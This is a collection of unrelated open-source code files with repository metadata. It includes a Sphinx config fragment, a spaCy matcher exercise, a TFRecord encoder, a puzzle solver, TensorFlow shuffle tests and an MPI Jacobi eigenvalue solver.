'stevedore.sphinxext',
'cliff.sphinxext',
]
# openstackdocstheme options
repository_name = 'dtroyer/osc-choochoo'
bug_project = ''
bug_tag = ''
# autodoc generation is a bit aggressive and a nuisance when doing heavy
# text edit cycles.
# execute "export SPHINX_DEBUG=1" in your terminal to disable
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'osc-choochoo'
copyright = u'2017 Dean Troyer'
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for HTML output --------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
# html_theme_path = ["."]
# html_theme = '_theme'
# html_static_path = ['static']
# Output file base name for HTML help builder.
htmlhelp_basename = '%sdoc' % project
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index',
'%s.tex' % project,
u'%s Documentation' % project,
u'OpenStack Foundation', 'manual'),
]
# Example configuration for intersphinx: refer to the Python standard library.
#intersphinx_mapping = {'http://docs.python.org/': None} | [
"[email protected]"
] | |
eeca7667162158e4c128fc7a5beedc8e432f8d53 | 4882e66d296cb0e5dab21de1170e13f8c54a6c9c | /Exercicios/2-ex7.py | 0e2b488de4c6e268228bb55c516ec4f10b0faca2 | [] | no_license | felipemanfrin/NLP | d6eac822fc919f93a1146c004540f62fe9c83086 | 45424ca49504d5f11e13f8d97829a0d5a9926bc2 | refs/heads/master | 2023-01-21T12:16:56.081979 | 2020-12-02T21:20:30 | 2020-12-02T21:20:30 | 268,633,901 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 581 | py | import spacy
from spacy.matcher import PhraseMatcher
nlp = spacy.load('en_core_web_sm')
matcher = PhraseMatcher(nlp.vocab)
pattern = ['swimming vigorously']
phrase_patterns = [nlp(text) for text in pattern]
matcher.add('SwimmingVigorously', None, *phrase_patterns)
with open('../UPDATED_NLP_COURSE/TextFiles/owlcreek.txt') as f:
doc = nlp(f.read())
found_matches = matcher(doc)
for match_id, start, end in found_matches:
    string_id = nlp.vocab.strings[match_id]  # map the match hash back to its rule name
    span = doc[max(start - 10, 0):end + 10]  # include up to 10 tokens of context around the match
print(match_id, string_id, start, end, span.text) | [
"[email protected]"
] | |
57af349162a6ec2e90c73196d07d293ccd657ef7 | e97c5e5beb22444b7eabd743a35493ab6fd4cb2f | /nbs/15_gsa_gls/20-null_simulations/20_gls_phenoplier/profiling/py/01_03-gls-profiling-new_code.py | 419a1aae91420228e40cf2683fc7fa6979628e86 | [
"BSD-2-Clause-Patent"
] | permissive | greenelab/phenoplier | bea7f62949a00564e41f73b361f20a08e2e77903 | b0e753415e098e93a1f206bb90b103a97456a96f | refs/heads/main | 2023-08-23T20:57:49.525441 | 2023-06-15T06:00:32 | 2023-06-22T16:12:37 | 273,271,013 | 5 | 2 | NOASSERTION | 2023-06-20T20:35:45 | 2020-06-18T15:13:58 | Jupyter Notebook | UTF-8 | Python | false | false | 1,943 | py | # ---
# jupyter:
# jupytext:
# cell_metadata_filter: all,-execution,-papermill,-trusted
# formats: ipynb,py//py:percent
# text_representation:
# extension: .py
# format_name: percent
# format_version: '1.3'
# jupytext_version: 1.13.8
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# %% [markdown] tags=[]
# # Description
# %% [markdown] tags=[]
# It profiles some functions that compute the correlation between genes' predicted expression. Each of these notebooks is meant to be run with a particular changeset checked out.
#
# **Before running this notebook**, make sure you are in this changeset:
# ```bash
# # the changes tried to improve the performance by activating lru_cache for method Gene._get_ssm_correlation
# git co fd3d476f0f4e53b8b8dfbe395dcf498c09b03aaf
# ```
# %%
# %load_ext line_profiler
# %% [markdown] tags=[]
# # Modules
# %% tags=[]
from entity import Gene
# %% [markdown]
# # Functions
# %%
def compute_ssm_correlation(all_genes):
res = []
for g1_idx, g1 in enumerate(all_genes[:-1]):
for g2 in all_genes[g1_idx:]:
c = g1.get_ssm_correlation(
g2,
reference_panel="1000G",
model_type="MASHR",
use_within_distance=False,
)
res.append(c)
return res
# %% [markdown]
# # Test case
# %%
gene1 = Gene(ensembl_id="ENSG00000180596")
gene2 = Gene(ensembl_id="ENSG00000180573")
gene3 = Gene(ensembl_id="ENSG00000274641")
gene4 = Gene(ensembl_id="ENSG00000277224")
all_genes = [gene1, gene2, gene3, gene4]
# %%
assert len(set([g.chromosome for g in all_genes])) == 1
# %% [markdown]
# # Run timeit
# %%
# %timeit compute_ssm_correlation(all_genes)
# %% [markdown]
# # Profile
# %%
# %prun -l 20 -s cumulative compute_ssm_correlation(all_genes)
# %%
# %prun -l 20 -s time compute_ssm_correlation(all_genes)
# %%
| [
"[email protected]"
] | |
09b56da17b552a715728664e0d4b355d51787a27 | 179140ef3ac111af7645636b5408894a3b61094f | /camera_trap_classifier/data/tfr_encoder_decoder.py | 2cf32feeda4cd2d78f8897e135b88d0269e7e2f9 | [
"MIT"
] | permissive | YunyiShen/camera-trap-classifier | 1d9bc3431ed31a00edfcd8fa4323fcf110ecc514 | 95f5f2db1c61f401e2408b8a9bfb6c069fa1a98e | refs/heads/master | 2020-12-04T06:42:24.552725 | 2020-01-03T23:01:44 | 2020-01-03T23:01:44 | 231,662,686 | 0 | 0 | MIT | 2020-01-03T20:47:03 | 2020-01-03T20:47:02 | null | UTF-8 | Python | false | false | 7,590 | py | """ Class To Encode and Decode TFRecords"""
import logging
import tensorflow as tf
from camera_trap_classifier.data.utils import (
wrap_int64, wrap_bytes, wrap_dict_bytes_list, wrap_dict_int64_list,
_bytes_feature_list,
_bytes_feature_list_str)
from camera_trap_classifier.data.image import decode_image_bytes_1D
logger = logging.getLogger(__name__)
class TFRecordEncoderDecoder(object):
""" Define Encoder and Decoder for a specific TFRecord file """
def __init__(self):
logger.info("Initializing TFRecordEncoderDecoder")
def encode_record(self, record_data):
raise NotImplementedError
def decode_record(self):
raise NotImplementedError
class DefaultTFRecordEncoderDecoder(TFRecordEncoderDecoder):
""" Default TFREncoder / Decoder """
def _convert_to_tfr_data_format(self, record):
""" Convert a record to a tfr format """
id = record['id']
n_images = record['n_images']
n_labels = record['n_labels']
image_paths = record['image_paths']
meta_data = record['meta_data']
label_text = record['labelstext']
labels = {k: v for k, v in record.items() if 'label/' in k}
labels_num = {k: v for k, v in record.items() if 'label_num/' in k}
label_features = wrap_dict_bytes_list(labels)
label_num_features = wrap_dict_int64_list(labels_num)
tfr_data = {
"id": wrap_bytes(tf.compat.as_bytes(id)),
"n_images": wrap_int64(n_images),
"n_labels": wrap_int64(n_labels),
"image_paths": _bytes_feature_list_str(image_paths),
"meta_data": wrap_bytes(tf.compat.as_bytes(meta_data)),
"labelstext": wrap_bytes(tf.compat.as_bytes(label_text)),
"images": _bytes_feature_list(record['images']),
**label_features,
**label_num_features
}
return tfr_data
def encode_record(self, record_data):
""" Encode Record to Serialized String """
tfr_data_dict = self._convert_to_tfr_data_format(record_data)
feature_attributes = set(['id', 'n_images', 'n_labels',
'meta_data', 'labelstext'])
feature_list_attributes = tfr_data_dict.keys() - feature_attributes
# Wrap the data as TensorFlow Features
feature_dict = {k: v for k, v in tfr_data_dict.items()
if k in feature_attributes}
feature = tf.train.Features(feature=feature_dict)
# Wrap lists as FeatureLists
feature_list_dict = {k: v for k, v in tfr_data_dict.items()
if k in feature_list_attributes}
feature_lists = tf.train.FeatureLists(feature_list=feature_list_dict)
# Wrap again as a TensorFlow Example.
example = tf.train.SequenceExample(
context=feature,
feature_lists=feature_lists)
# Serialize the data.
serialized = example.SerializeToString()
return serialized
def decode_record(self, serialized_example,
output_labels,
label_lookup_dict=None,
image_pre_processing_fun=None,
image_pre_processing_args=None,
image_choice_for_sets='random',
decode_images=True,
numeric_labels=False,
return_only_ml_data=True,
only_return_one_label=True
):
""" Decode TFRecord and return dictionary """
# fixed size Features - ID and labels
if return_only_ml_data:
context_features = {
'id': tf.FixedLenFeature([], tf.string)
}
else:
context_features = {
'id': tf.FixedLenFeature([], tf.string),
'n_images': tf.FixedLenFeature([], tf.int64),
'n_labels': tf.FixedLenFeature([], tf.int64),
'meta_data': tf.FixedLenFeature([], tf.string),
'labelstext': tf.FixedLenFeature([], tf.string)
}
# Extract labels (string and numeric)
label_names = ['label/' + l for l in output_labels]
label_features = {k: tf.FixedLenSequenceFeature([], tf.string)
for k in label_names}
label_num_names = ['label_num/' + l for l in output_labels]
label_num_features = {k: tf.FixedLenSequenceFeature([], tf.int64)
for k in label_num_names}
if return_only_ml_data:
if numeric_labels:
sequence_features = {
'images': tf.FixedLenSequenceFeature([], tf.string),
**label_num_features
}
else:
sequence_features = {
'images': tf.FixedLenSequenceFeature([], tf.string),
**label_features
}
else:
sequence_features = {
'images': tf.FixedLenSequenceFeature([], tf.string),
'image_paths': tf.FixedLenSequenceFeature([], tf.string),
**label_features,
**label_num_features
}
# Parse the serialized data so we get a dict with our data.
context, sequence = tf.parse_single_sequence_example(
serialized=serialized_example,
context_features=context_features,
sequence_features=sequence_features)
# determine label prefix for either numeric or string labels
if numeric_labels:
label_prefix = 'label_num/'
else:
label_prefix = 'label/'
        # Whether to return only the labels of the first observation or all,
        # and whether to map string labels to integers using a lookup table
if only_return_one_label:
if label_lookup_dict is not None and not numeric_labels:
parsed_labels = {
k: tf.reshape(label_lookup_dict[k].lookup(v[0]), [1])
for k, v in sequence.items() if label_prefix in k}
else:
parsed_labels = {
k: v[0]
for k, v in sequence.items() if label_prefix in k}
else:
if label_lookup_dict is not None and not numeric_labels:
parsed_labels = {
k: label_lookup_dict[k].lookup(v)
for k, v in sequence.items() if label_prefix in k}
else:
parsed_labels = {
k: v
for k, v in sequence.items() if label_prefix in k}
if not decode_images:
return {**{k: v for k, v in context.items()},
**{k: v for k, v in sequence.items()
if label_prefix not in k},
**parsed_labels}
# decode 1-D tensor of raw images
image = decode_image_bytes_1D(
sequence['images'],
**image_pre_processing_args)
# Pre-Process image
if image_pre_processing_fun is not None:
image_pre_processing_args['image'] = image
image = image_pre_processing_fun(**image_pre_processing_args)
return ({'images': image},
{**{k: v for k, v in context.items()},
**{k: v for k, v in sequence.items()
if label_prefix not in k and 'images' not in k},
**parsed_labels})
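# Minimal round-trip sketch (field names follow this module's conventions;
# the concrete values are assumptions):
#   coder = DefaultTFRecordEncoderDecoder()
#   record = {"id": "rec-001", "n_images": 1, "n_labels": 1,
#             "image_paths": ["img0.jpg"], "meta_data": "{}",
#             "labelstext": "species:cat", "images": [raw_jpeg_bytes],
#             "label/species": ["cat"], "label_num/species": [0]}
#   serialized = coder.encode_record(record)
#   # write with tf.io.TFRecordWriter, then parse back in a tf.data pipeline
#   # via coder.decode_record.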
| [
"[email protected]"
] | |
93ee6822569c5b7e9169ffac1e02ef95e6d5c928 | 412b0612cf13e9e28b9ea2e625975f3d9a2f52b6 | /2017/18/double_computer.py | 15e82c468b7a8a9ed25058bcadfb08c381a40aa1 | [] | no_license | AlexClowes/advent_of_code | 2cf6c54a5f58db8482d1692a7753b96cd84b6279 | d2158e3a4edae89071e6a88c9e874a9a71d4d0ec | refs/heads/master | 2022-12-24T19:02:07.815437 | 2022-12-23T17:35:53 | 2022-12-23T17:35:53 | 225,618,394 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,700 | py | from collections import defaultdict
import operator
from queue import Queue
def prog(program, program_id, snd_queue, rcv_queue):
registers = defaultdict(int)
registers["p"] = program_id
value = lambda x: registers[x] if x.isalpha() else int(x)
instruction_pointer = 0
while 0 <= instruction_pointer < len(program):
op, *args = program[instruction_pointer].split()
if op == "set":
registers[args[0]] = value(args[1])
elif op in ("add", "mul", "mod"):
func = getattr(operator, op)
registers[args[0]] = func(registers[args[0]], value(args[1]))
elif op == "jgz":
if value(args[0]) > 0:
instruction_pointer += value(args[1]) - 1
elif op == "snd":
snd_queue.put(value(args[0]))
yield True
elif op == "rcv":
if rcv_queue.empty():
instruction_pointer -= 1
yield False
else:
registers[args[0]] = rcv_queue.get()
instruction_pointer += 1
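# prog() is driven as a coroutine: it yields True right after executing a
# `snd` and yields False when a `rcv` finds its queue empty (the instruction
# pointer is rewound so the same `rcv` is retried on resume). This lets
# count_sends_before_blocking() run each program until it blocks on input.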
def count_sends_before_blocking(prog):
ret = 0
while next(prog):
ret += 1
return ret
def run(program):
q0, q1 = Queue(), Queue()
prog0 = prog(program, 0, q0, q1)
prog1 = prog(program, 1, q1, q0)
total = 0
while True:
prog0_sends = count_sends_before_blocking(prog0)
prog1_sends = count_sends_before_blocking(prog1)
total += prog1_sends
if prog0_sends == prog1_sends == 0:
return total
def main():
with open("program.txt") as f:
program = [line.strip() for line in f]
print(run(program))
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
eb27a95802962717549a291267adf4019d33615d | 5fdace6ee07fe9db58f026a4764629261203a173 | /tensorflow/python/data/kernel_tests/shuffle_test.py | ceca3e8d61f1fbf65c81ba3762f5e6d8fc7ad1cf | [
"Apache-2.0"
] | permissive | davidstone/tensorflow | 5ed20bb54659a1cb4320f777790a3e14551703d7 | 6044759779a564b3ecffe4cb60f28f20b8034add | refs/heads/master | 2022-04-28T02:19:53.694250 | 2020-04-24T17:41:08 | 2020-04-24T17:41:08 | 258,335,682 | 0 | 0 | Apache-2.0 | 2020-04-23T21:32:14 | 2020-04-23T21:32:13 | null | UTF-8 | Python | false | false | 14,239 | py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for `tf.data.Dataset.shuffle()`."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import functools
from absl.testing import parameterized
import numpy as np
from tensorflow.python import tf2
from tensorflow.python.compat import compat
from tensorflow.python.data.kernel_tests import test_base
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.eager import context
from tensorflow.python.eager import function
from tensorflow.python.framework import combinations
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
class ShuffleTest(test_base.DatasetTestBase, parameterized.TestCase):
@combinations.generate(test_base.default_test_combinations())
def testBasic(self):
components = (
np.array([1, 2, 3, 4]), np.array([5, 6, 7, 8]),
np.array([9.0, 10.0, 11.0, 12.0])
)
def dataset_fn(count=5, buffer_size=None, seed=0):
repeat_dataset = (
dataset_ops.Dataset.from_tensor_slices(components).repeat(count))
if buffer_size:
shuffle_dataset = repeat_dataset.shuffle(buffer_size, seed)
self.assertEqual(
tuple([c.shape[1:] for c in components]),
dataset_ops.get_legacy_output_shapes(shuffle_dataset))
return shuffle_dataset
else:
return repeat_dataset
# First run without shuffling to collect the "ground truth".
get_next = self.getNext(dataset_fn())
unshuffled_elements = []
for _ in range(20):
unshuffled_elements.append(self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
# Assert that the shuffled dataset has the same elements as the
# "ground truth".
get_next = self.getNext(dataset_fn(buffer_size=100, seed=37))
shuffled_elements = []
for _ in range(20):
shuffled_elements.append(self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
self.assertAllEqual(sorted(unshuffled_elements), sorted(shuffled_elements))
# Assert that shuffling twice with the same seeds gives the same sequence.
get_next = self.getNext(dataset_fn(buffer_size=100, seed=37))
reshuffled_elements_same_seed = []
for _ in range(20):
reshuffled_elements_same_seed.append(self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
self.assertEqual(shuffled_elements, reshuffled_elements_same_seed)
# Assert that shuffling twice with a different seed gives a different
# permutation of the same elements.
get_next = self.getNext(dataset_fn(buffer_size=100, seed=137))
reshuffled_elements_different_seed = []
for _ in range(20):
reshuffled_elements_different_seed.append(self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
self.assertNotEqual(shuffled_elements, reshuffled_elements_different_seed)
self.assertAllEqual(
sorted(shuffled_elements), sorted(reshuffled_elements_different_seed))
# Assert that the shuffled dataset has the same elements as the
# "ground truth" when the buffer size is smaller than the input
# dataset.
get_next = self.getNext(dataset_fn(buffer_size=2, seed=37))
reshuffled_elements_small_buffer = []
for _ in range(20):
reshuffled_elements_small_buffer.append(self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
self.assertAllEqual(
sorted(unshuffled_elements), sorted(reshuffled_elements_small_buffer))
# Test the case of shuffling an empty dataset.
get_next = self.getNext(dataset_fn(count=0, buffer_size=100, seed=37))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
@combinations.generate(combinations.combine(tf_api_version=1, mode="graph"))
def testSeedZero(self):
"""Test for same behavior when the seed is a Python or Tensor zero."""
iterator = dataset_ops.make_one_shot_iterator(
dataset_ops.Dataset.range(10).shuffle(10, seed=0))
get_next = iterator.get_next()
elems = []
with self.cached_session() as sess:
for _ in range(10):
elems.append(sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
seed_placeholder = array_ops.placeholder(dtypes.int64, shape=[])
iterator = dataset_ops.make_initializable_iterator(
dataset_ops.Dataset.range(10).shuffle(10, seed=seed_placeholder))
get_next = iterator.get_next()
with self.cached_session() as sess:
sess.run(iterator.initializer, feed_dict={seed_placeholder: 0})
for elem in elems:
self.assertEqual(elem, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
@combinations.generate(test_base.default_test_combinations())
def testDefaultArguments(self):
components = [0, 1, 2, 3, 4]
dataset = dataset_ops.Dataset.from_tensor_slices(components).shuffle(
5).repeat()
get_next = self.getNext(dataset)
counts = collections.defaultdict(lambda: 0)
for _ in range(10):
for _ in range(5):
counts[self.evaluate(get_next())] += 1
for i in range(5):
self.assertEqual(10, counts[i])
@combinations.generate(
combinations.times(
test_base.graph_only_combinations(),
combinations.combine(reshuffle=[True, False]),
combinations.combine(graph_seed=38, op_seed=None) +
combinations.combine(graph_seed=None, op_seed=42) +
combinations.combine(graph_seed=38, op_seed=42)))
def testShuffleSeed(self, reshuffle, graph_seed, op_seed):
results = []
for _ in range(2):
with ops.Graph().as_default() as g:
random_seed.set_random_seed(graph_seed)
dataset = dataset_ops.Dataset.range(10).shuffle(
10, seed=op_seed, reshuffle_each_iteration=reshuffle).repeat(3)
iterator = dataset_ops.make_one_shot_iterator(dataset)
next_element = iterator.get_next()
run_results = []
with self.session(graph=g) as sess:
for _ in range(30):
run_results.append(sess.run(next_element))
with self.assertRaises(errors.OutOfRangeError):
sess.run(next_element)
results.append(run_results)
self.assertAllEqual(results[0], results[1])
# TODO(b/117581999): enable this test for eager-mode.
@combinations.generate(
combinations.times(
test_base.graph_only_combinations(),
combinations.combine(
reshuffle=[True, False], initializable=[True, False])))
def testMultipleIterators(self, reshuffle, initializable):
with ops.Graph().as_default() as g:
dataset = dataset_ops.Dataset.range(100).shuffle(
10, reshuffle_each_iteration=reshuffle).repeat(3)
if initializable:
iterators = [dataset_ops.make_initializable_iterator(dataset)
for _ in range(2)]
else:
iterators = [dataset_ops.make_one_shot_iterator(dataset)
for _ in range(2)]
results = []
with self.session(graph=g) as sess:
for iterator in iterators:
if initializable:
sess.run(iterator.initializer)
next_element = iterator.get_next()
run_results = []
for _ in range(300):
run_results.append(sess.run(next_element))
with self.assertRaises(errors.OutOfRangeError):
sess.run(next_element)
results.append(run_results)
self.assertNotEqual(results[0], results[1])
@combinations.generate(
combinations.times(
test_base.default_test_combinations(),
combinations.combine(reshuffle=[True, False], seed=[None, 42])))
def testReshuffleRepeatEpochs(self, reshuffle, seed):
dataset = dataset_ops.Dataset.range(10).shuffle(
10, seed=seed, reshuffle_each_iteration=reshuffle).repeat(2)
next_element = self.getNext(dataset)
first_epoch = []
for _ in range(10):
first_epoch.append(self.evaluate(next_element()))
second_epoch = []
for _ in range(10):
second_epoch.append(self.evaluate(next_element()))
self.assertEqual(first_epoch == second_epoch, not reshuffle)
@combinations.generate(
combinations.times(
combinations.combine(tf_api_version=2, mode="eager"),
combinations.combine(reshuffle=[True, False], seed=[None, 42])))
def testReshuffleIterationEpochs(self, reshuffle, seed):
# TensorFlow unit tests set the global graph seed. We unset it here so that
# we can control determinism via the `seed` parameter.
random_seed.set_random_seed(None)
dataset = dataset_ops.Dataset.range(10).shuffle(
10, seed=seed, reshuffle_each_iteration=reshuffle)
first_epoch = self.getDatasetOutput(dataset)
second_epoch = self.getDatasetOutput(dataset)
self.assertEqual(first_epoch == second_epoch, not reshuffle)
@combinations.generate(combinations.combine(tf_api_version=2, mode="eager"))
def testShuffleV2ResourceCapture(self):
def make_dataset():
ids = dataset_ops.Dataset.range(10)
ids = ids.shuffle(1)
def interleave_fn(dataset, _):
return dataset
dataset = dataset_ops.Dataset.range(1)
dataset = dataset.interleave(functools.partial(interleave_fn, ids))
return dataset
results = []
for elem in make_dataset():
results.append(elem.numpy())
self.assertAllEqual(results, range(10))
@combinations.generate(
combinations.times(
test_base.eager_only_combinations(),
combinations.combine(reshuffle=[True, False], seed=[None, 42])))
def testReshuffleSeparateTransformations(self, reshuffle, seed):
dataset = dataset_ops.Dataset.range(10)
first_epoch = []
for elem in dataset.shuffle(
10, seed=seed, reshuffle_each_iteration=reshuffle):
first_epoch.append(elem.numpy())
second_epoch = []
for elem in dataset.shuffle(
10, seed=seed, reshuffle_each_iteration=reshuffle):
second_epoch.append(elem.numpy())
self.assertEqual(first_epoch != second_epoch, seed is None)
@combinations.generate(combinations.combine(tf_api_version=2, mode="eager"))
def testShuffleV2InFunction(self):
counter_var = variables.Variable(0)
@function.defun
def consume():
ds = dataset_ops.Dataset.range(10)
ds = ds.shuffle(1)
for _ in ds:
counter_var.assign(counter_var + 1)
consume()
self.assertAllEqual(self.evaluate(counter_var), 10)
@combinations.generate(test_base.default_test_combinations())
def testEmptyDataset(self):
dataset = dataset_ops.Dataset.from_tensors(1)
def map_fn(x):
with ops.control_dependencies([check_ops.assert_equal(x, 0)]):
return x
dataset = dataset.map(map_fn)
dataset = dataset.cache()
dataset = dataset.shuffle(buffer_size=10).repeat()
get_next = self.getNext(dataset)
# First time around, we get an error for the failed assertion.
with self.assertRaises(errors.InvalidArgumentError):
self.evaluate(get_next())
# Second time around, we get an EOF because the cached dataset is empty.
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
# We skip v2 eager since the v2 eager shuffle dataset is not serializable due
# to its use of an external seed generator resource.
@combinations.generate(
combinations.times(
test_base.graph_only_combinations() +
combinations.combine(mode=["eager"]),
combinations.combine(reshuffle=[True, False])))
def testRerandomizeOnReplicate(self, reshuffle):
if tf2.enabled() and not compat.forward_compatible(2020, 5, 22):
self.skipTest("Functionality currently not supported.")
random_seed.set_random_seed(None)
# When no seeds are fixed, each instantiation of the shuffle dataset should
# produce elements in a different order.
num_elements = 100
dataset = dataset_ops.Dataset.range(num_elements)
dataset = dataset.shuffle(num_elements, reshuffle_each_iteration=reshuffle)
shuffle_1 = self.getDatasetOutput(dataset)
dataset = self.graphRoundTrip(dataset, allow_stateful=True)
shuffle_2 = self.getDatasetOutput(dataset)
self.assertCountEqual(shuffle_1, shuffle_2)
self.assertNotEqual(shuffle_1, shuffle_2)
@combinations.generate(test_base.default_test_combinations())
def testCoordinateShuffling(self):
if not compat.forward_compatible(
2020, 5, 22) and tf2.enabled() and context.executing_eagerly():
self.skipTest("Functionality currently not supported.")
num_elements = 100
ds = dataset_ops.Dataset.range(num_elements)
ds = ds.shuffle(num_elements, seed=42)
ds = dataset_ops.Dataset.zip((ds, ds))
get_next = self.getNext(ds)
for _ in range(100):
x, y = self.evaluate(get_next())
self.assertEqual(x, y)
if __name__ == "__main__":
test.main()
# ==== /NM/cp/main.py | repo: tutkarma/mai_study | license: none ====
import argparse
import json
from utils import save_to_file
from mpi4py import MPI
import numpy as np
def read_data(filename, need_args):
init_dict = {}
with open(filename, 'r') as json_data:
        data = json.load(json_data)[0]  # the input JSON is a one-element list; take its only object
for arg in need_args:
if arg not in data:
raise ValueError('No "{0}" in given data'.format(arg))
if arg == 'matrix':
init_dict[arg] = np.array(data[arg], dtype=np.float64)
else:
init_dict[arg] = data[arg]
return init_dict
def sign(n):
return 1 if n > 0 else -1
def t(A):
return np.sqrt(sum([A[i, j] ** 2 for i in range(A.shape[0])
for j in range(i + 1, A.shape[0])]))
def indexes_max_elem(A):
i_max = j_max = 0
a_max = A[0, 0]
for i in range(A.shape[0]):
for j in range(i + 1, A.shape[0]):
if abs(A[i, j]) > a_max:
a_max = abs(A[i, j])
i_max, j_max = i, j
return i_max, j_max
def parallel_jacobi_rotate(comm, A, ind_j, ind_k):
sz = A.shape[0]
rank = comm.Get_rank()
pool_size = comm.Get_size()
c = s = 0.0
j = k = 0
row_j, row_k = np.zeros(sz), np.zeros(sz)
if rank == 0:
j, k = ind_j, ind_k
if A[j, j] == A[k, k]:
c = np.cos(np.pi / 4)
s = np.sin(np.pi / 4)
else:
tau = (A[j, j] - A[k, k]) / (2 * A[j, k])
t = sign(tau) / (abs(tau) + np.sqrt(1 + tau ** 2))
c = 1 / np.sqrt(1 + t ** 2)
s = c * t
for i in range(sz):
row_j[i] = A[j, i]
row_k[i] = A[k, i]
j = comm.bcast(j, root=0)
k = comm.bcast(k, root=0)
c = comm.bcast(c, root=0)
s = comm.bcast(s, root=0)
comm.Bcast(row_j, root=0)
comm.Bcast(row_k, root=0)
row_j_comm = comm.Create_group(comm.group.Incl([i for i in range(1, pool_size) if i % 2 == 1]))
row_k_comm = comm.Create_group(comm.group.Incl([i for i in range(1, pool_size) if i % 2 == 0]))
row_j_rank = row_j_size = -1
row_j_new = np.zeros(sz)
if MPI.COMM_NULL != row_j_comm:
row_j_rank = row_j_comm.Get_rank()
row_j_size = row_j_comm.Get_size()
size = int(sz / row_j_size)
row_j_part = np.zeros(size)
row_k_part = np.zeros(size)
row_j_new_part = np.zeros(size)
row_j_comm.Scatter(row_j, row_j_part, root=0)
row_j_comm.Scatter(row_k, row_k_part, root=0)
for i in range(size):
row_j_new_part[i] = c * row_j_part[i] + s * row_k_part[i]
row_j_comm.Gather(row_j_new_part, row_j_new, root=0)
if row_j_rank == 0:
            comm.Send([row_j_new, sz, MPI.DOUBLE], dest=0, tag=0)  # buffer is float64, so MPI.DOUBLE, not MPI.FLOAT
row_j_comm.Free()
row_k_rank = row_k_size = -1
row_k_new = np.zeros(sz)
if MPI.COMM_NULL != row_k_comm:
row_k_rank = row_k_comm.Get_rank()
row_k_size = row_k_comm.Get_size()
size = int(sz / row_k_size)
row_j_part = np.zeros(size)
row_k_part = np.zeros(size)
row_k_new_part = np.zeros(size)
row_k_comm.Scatter(row_j, row_j_part, root=0)
row_k_comm.Scatter(row_k, row_k_part, root=0)
for i in range(size):
row_k_new_part[i] = s * row_j_part[i] - c * row_k_part[i]
row_k_comm.Gather(row_k_new_part, row_k_new, root=0)
if row_k_rank == 0:
            comm.Send([row_k_new, sz, MPI.DOUBLE], dest=0, tag=0)  # float64 buffer
row_k_comm.Free()
if rank == 0:
status = MPI.Status()
        comm.Recv([row_j_new, sz, MPI.DOUBLE], source=1, tag=0, status=status)
        comm.Recv([row_k_new, sz, MPI.DOUBLE], source=2, tag=0, status=status)
A[j, k] = A[k, j] = (c ** 2 - s ** 2) * row_j[k] + s * c * (row_k[k] - row_j[j])
A[j, j] = c ** 2 * row_j[j] + 2 * s * c * row_j[k] + s ** 2 * row_k[k]
A[k, k] = s ** 2 * row_j[j] - 2 * s * c * row_j[k] + c ** 2 * row_k[k]
for i in range(sz):
if i != j and i != k:
A[j, i] = A[i, j] = row_j_new[i]
A[k, i] = A[i, k] = row_k_new[i]
return A
def jacobi_parallel(comm, A, eps):
elapsed_time = 0
i, j = indexes_max_elem(A)
norm = t(A)
rank = comm.Get_rank()
eps = comm.bcast(eps, root=0)
norm = comm.bcast(norm, root=0)
k = 1
while norm > eps:
elapsed_time -= MPI.Wtime()
A = parallel_jacobi_rotate(comm, A, j, i)
if rank == 0:
norm = t(A)
elapsed_time += MPI.Wtime()
norm = comm.bcast(norm, root=0)
i, j = indexes_max_elem(A)
k += 1
return np.diag(A).tolist()
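# --- Added sketch (not part of the original file): a serial cross-check. ---
# For small symmetric inputs, the parallel Jacobi result can be validated on
# rank 0 against NumPy's dense symmetric eigensolver.
def eigenvalues_reference(A):
    """Reference eigenvalues of a symmetric matrix via numpy.linalg.eigvalsh."""
    return sorted(np.linalg.eigvalsh(A).tolist())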
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--input', required=True, help='Input file')
parser.add_argument('--output', required=True, help='Output file')
args = parser.parse_args()
elapsed_time = 0
need_args = ('matrix', 'eps')
init_dict = read_data(args.input, need_args)
A, eps = init_dict['matrix'], init_dict['eps']
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
elapsed_time -= MPI.Wtime()
eig = jacobi_parallel(comm, A, eps)
elapsed_time += MPI.Wtime()
if rank == 0:
save_to_file(args.output, eigenvalues=eig)
